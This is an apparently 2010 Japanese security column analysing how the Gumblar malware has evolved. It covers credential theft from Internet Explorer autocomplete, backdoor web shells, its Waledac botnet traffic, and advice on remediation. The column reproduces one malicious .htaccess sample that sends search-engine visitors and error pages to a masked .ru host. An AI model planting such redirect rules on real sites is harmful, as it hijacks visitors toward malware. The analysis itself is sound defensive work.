Gumblar、いま注目すべきは名前ではなく“事象”川口洋のセキュリティ・プライベート・アイズ(24)

» 2010年04月13日 10時00分 公開
[川口洋@IT]

 皆さんこんにちは、川口です。いきなりですが、最近私も「つぶやき」を始めています。といっても、はやりのTwitterではなく、動画での「つぶやき」です。YouTubeの「laccotv」というチャンネルで1〜2分の短いテーマを毎週掲載しています。毎週掲載というプレッシャーの中、いつまでネタが続くか楽しみにしていてください。

【関連記事】

川口洋のつぶやき K's Private Talk
http://www.youtube.com/user/laccotv


 今回のコラムは、そのつぶやきの中で取り上げることが多い、いわゆる「Gumblar」(もはやこの定義もかなりあいまいになっていますが)に関する「そのあと」の情報を説明します。

FTP“以外”のアカウント情報の盗用

 2010年は大企業サイトの改ざん事件に関する報道もあり、Gumblarは一気に世間の注目を集めました。2010年1月から3月にかけては、どのお客さまへお伺いしても、Gumblarの話題を依頼されていました。セミナーや勉強会、個別説明を含めると、おそらく3カ月間で40回以上はGumblarについて話していた気がします。一時的にではありますが、日本で一番Gumblarについて話している男だったかもしれません。

 そこでよく質問される内容は以下のものでした。

  • 「FTPを使っていなければ安全なんですよね?」
  • 「FTPの情報だけしか盗まないんですよね?」

 Gumblarがはやり始めた当初は、「いま“は”そうですね。しかし、明日には変わっているかもしれませんよ」とお答えしていたのですが、現在ではFTPの情報以外にも、Internet Explorerに記憶させているアカウント情報を盗んでいくケースがあります。

【関連記事】

FTPソフトに加えIE6では「オートコンプリート」のアカウント情報も流出
http://www.atmarkit.co.jp/news/201002/03/gumblar.html


 Gumblarに感染すると、以下のような文字列を含むHTTPのPOST通信が発生します。

図1 Gumblarが送信するPOST文字列の例 図1 Gumblarが送信するPOST文字列の例

 一見、何の情報なのかわかりませんが、これはBASE64でエンコードされています。デコードすると以下の内容が確認できます。

図2 BASE64でデコードする 図2 BASE64でデコードする

【注】

このデータはコラム用に作成したものですので、もちろん実際にログインを試すようなことはしないでください


 「PS__::」に続く部分にIDとパスワードらしき情報が並んでいます。これはInternet Explorerのオートコンプリート機能で記憶させているアカウント情報です。Gumblarは感染したPCに格納されているアカウント情報を盗み、暗号化(BASE64を暗号化と呼ぶには語弊がありますが)して外部に送信しています。

 ブラウザ以外でも、PCにアカウント情報を格納し、何らかの形でそのアカウント情報を使っていれば、技術的にはアカウント情報を盗むことが可能です。現在はGumblarがアカウントを盗む対象アプリケーションを利用していないからといって安心しないでください。万が一、Gumblarに感染した場合には、面倒でもシステムで使用しているパスワードをすべて変更するべきでしょう。

コンテンツファイル以外の改ざん

 コンテンツ改ざんにも新しい方法が現れています。従来のGumblarはFTPサーバにログインし、既存のコンテンツに悪性サイトへの誘導リンクを挿入していました。しかし、既存のコンテンツを書き換えずに悪性サイトへ誘導する新しい手法が現れました。具体的には、Apacheの設定ファイルである「.htaccess」ファイルを改ざんすることで、既存のコンテンツに手を加えることなく、悪性サイトへの誘導を行います。

【関連記事】

注意喚起:Gumblar(ガンブラー)ウイルスによる新たなホームページ改ざん被害を確認
http://www.lac.co.jp/info/alert/alert20100303.html


 私たちが確認した不審な「.htaccess」ファイルは以下のようなものです。

# HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ http://********.ru/ [R=301,L]
ErrorDocument 401 http://********.ru/
ErrorDocument 403 http://********.ru/
ErrorDocument 404 http://********.ru/
ErrorDocument 500 http://********.ru/
# /HostRule
リスト 書き換えられる.htaccess文字列の例

 ブラウザ内の「お気に入り」からのアクセスや、ほかのサイトからのリンクからのアクセスの場合には、正常なコンテンツが表示されます。しかし、検索エンジンからのアクセスや、存在しないファイルにアクセスした場合には、悪性サイトに自動的に誘導されます。特定条件下でのみ誘導が行われるため、リモートからのホームページ改ざんチェック機能では発見できない可能性がありますので、現在、リモートからチェックされている人はご注意ください。

バックドアの設置

 Gumblarおよび攻撃者は、FTPサーバにログインしたあとに悪性サイトへ誘導するために、既存コンテンツや「.htaccess」ファイルを改ざんする以外にも、ウェブ経由でサーバを操作することができるバックドアを設置するケースがありました。ウェブ経由でサーバの操作を可能とするバックドアは「ウェブシェル」(WebShell)とも呼ばれます。簡単なHTTPリクエストを送信することで操作することができるものや、ブラウザから操作が可能な多機能なものまで多数存在します。

 バックドアを設置された場合、ログインに利用されたFTPサーバのパスワードを変更しても、サーバの操作が可能です。被害を受けたサーバの調査が不十分であったためバックドアが残されており、再度改ざんを受けるケースもありますので、被害を受けたサーバの調査は徹底的に実施しましょう。

 当然の話ですが、「.htaccess」ファイルの改ざんの話もバックドアの話も、そもそもサーバに不正にログインさせなければ、このような問題におびえることはありません。FTPサーバのアクセス制御とアカウント情報の漏えいに対する対処はもちろんのことですが、SQLインジェクションやそのほかの脆弱性を狙った攻撃も、これらと同様に対応してください。

Gumblarの通信形態の変化

 Gumblarに感染したPCはHTTPでのPtoPネットワークを形成します。これは、川口洋のつぶやき第2回目でも説明しています。

【関連記事】

「Gumblar とConfickerにつながるWaledac」
 〜川口洋のつぶやき 第2回 03/05/2010

http://www.youtube.com/watch?v=tBATrIVY0Rg

動画が取得できませんでした

 Gumblarに感染した端末は、このPtoPネットワークを経由してC&Cサーバ(指令用のサーバ)との命令を送受信します。このHTTP通信に現れるサーバは常に新しいノード情報へとアップデートされており、特定が困難です。またHTTPのURLもランダムに生成されており、一見すると通常のウェブアクセスで発生するHTTP通信と見間違えてしまうほどです。このようなボットのグループを通称「Waledac」といいます。このWaledacは2009年から問題になっているConfickerの亜種にも利用されていました。

 「GumblarとConfickerが融合すると面倒なことになりそうだ」と恐れていたのですが、よいニュースがありました。マイクロソフトがWaledacの感染PCからC&Cサーバへの通信を遮断する設定を行いました。

【関連記事】

Microsoftがボットネット対抗作戦、Waledacの通信断ち切る
http://www.itmedia.co.jp/enterprise/articles/1002/26/news029.html

Cracking Down on Botnets
http://blogs.technet.com/microsoft_blog/archive/2010/02/25/cracking-down-on-botnets.aspx


 JSOCで観測している環境でも、ある時期を境にWaledacの活動は大幅に減少しました。今回の一連の作業に掛かるマイクロソフトのコストは多大なものであったと想定できますが、このような活動は(誰が予算を出すかが問題ですが)続けてほしいものです。


 ホームページ改ざんにつながるGumblar被害の報道の温度は下がってきましたが、私たちの関心が薄くなっている間も、Gumblarは常に進化しています。今回紹介したもの以外に、HTTPSサービスに攻撃をさせるようなタイプのボットや、SNSを使って感染を広げるボットが埋め込まれるケースも発生しています。もはやGumblarは当初の言葉の定義には収まりきらないインシデントとなっています。

 私たちは一時的なGumblarに限った対策ではなく、Gumblarを含む広義のウイルス(マルウェア)の対策を行わなければなりません。今後もさまざまなウイルスやインシデントについての情報発信をこのコラム「川口洋のセキュリティ・プライベート・アイズ」と「川口洋のつぶやき K's Private Talk」でお届けしていきます。私は新たなテーマを探すため、今夜も飲みにいくのでした。

Profile

川口 洋(かわぐち ひろし)
株式会社ラック
JSOCチーフエバンジェリスト兼セキュリティアナリスト
CISSP

ラック入社後、IDSやファイアウォールなどの運用・管理業務をへて、セキュリティアナリストとして、JSOC監視サービスに従事し、日々セキュリティインシデントに対応。

アナリストリーダとして、セキュリティイベントの分析とともに、IDS/IPSに適用するJSOCオリジナルシグネチャ(JSIG)の作成、チューニングを実施し、監視サービスの技術面のコントロールを行う。

現在、JSOCチーフエバンジェリスト兼セキュリティアナリストとして、JSOC全体の技術面をコントロールし、監視報告会、セミナー講師など対外的な活動も行う。


「川口洋のセキュリティ・プライベート・アイズ」バックナンバー

Copyright © ITmedia, Inc. All Rights Reserved.

RSSについて

アイティメディアIDについて

メールマガジン登録

@ITのメールマガジンは、 もちろん、すべて無料です。ぜひメールマガジンをご購読ください。